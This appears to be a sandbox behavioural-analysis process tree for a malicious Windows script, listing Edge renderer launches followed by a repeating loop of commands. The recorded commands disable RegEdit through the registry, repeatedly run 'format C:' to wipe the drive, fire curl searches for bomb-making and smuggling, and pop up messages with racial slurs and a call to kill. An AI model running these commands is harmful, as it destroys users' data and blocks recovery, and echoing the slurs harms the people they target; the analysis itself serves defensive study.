C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=9076,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9320 /prefetch:16⤵PID:6008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=9448,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9104 /prefetch:16⤵PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=9092,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9988 /prefetch:16⤵PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=9452,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=10132 /prefetch:16⤵PID:5008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=10352,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=10332 /prefetch:16⤵PID:6464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=10508,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9580 /prefetch:16⤵PID:6840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10684,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=10360 /prefetch:16⤵PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=10060,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=9376 /prefetch:16⤵PID:6676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11004,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11112 /prefetch:16⤵PID:7012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=11540,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11568 /prefetch:16⤵PID:6528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11720,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11244 /prefetch:16⤵PID:7028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=11912,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11944 /prefetch:16⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=11916,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12116 /prefetch:16⤵PID:6312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12360,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12388 /prefetch:16⤵PID:6164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12520,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12560 /prefetch:16⤵PID:7108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=12772,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=12348 /prefetch:16⤵PID:6864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13180,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13068 /prefetch:16⤵PID:6952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13364,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13396 /prefetch:16⤵PID:6428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13556,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13568 /prefetch:16⤵PID:6780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=13900,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=13924 /prefetch:16⤵PID:7600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=14152,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=14184 /prefetch:16⤵PID:7888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=11228,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=11012 /prefetch:16⤵PID:7344
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak4⤵
- Delays execution with timeout.exe
PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
PID:5224
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3224
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4428
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5704
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4672
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5804
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1052
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4668
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2104
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1856
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4756
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1940
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3660
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2504
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2672
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1156
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5648
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4300
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:5308
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3856
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1092
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5132
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3392
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:780
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3480
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:304
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:544
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1888
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1484
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4620
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5148
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1396
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6120
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2128
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4924
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2068
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3620
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6088
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4672
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4024
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1444
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:860
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1360
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4640
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:568
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4964
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1568
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:2108
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4112
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5684
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:3928
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5612
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6120
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4332
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1392
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2912
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4188
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3644
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3120
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4292
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1168
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4820
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1084
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5968
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4332
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:300
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4496
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6116
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4940
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6036
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1168
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4868
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2760
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1084
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4672
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1520
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5100
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1960
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4824
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1192
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:3348
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4572
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:1308
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1800
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1960
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3136
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2032
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1512
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2716
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5632
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:860
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1800
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4680
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3476
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3180
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4824
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6120
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:2976
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1940
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5008
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1656
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5500
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5008
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4884
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5424
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:292
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5500
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6200
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6296
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6524
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6652
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6684
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6700
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6716
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6740
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6800
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6812
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6980
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7060
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6272
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6372
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6324
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2760
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6480
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6504
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6524
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6644
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6864
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:7152
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:7076
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6256
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6372
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6300
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:2760
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6480
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6444
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6504
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:6972
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3528
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:6356
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:6492
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:6640
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:6684
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6404
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6452
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:6644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:6660
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:6784
-
-
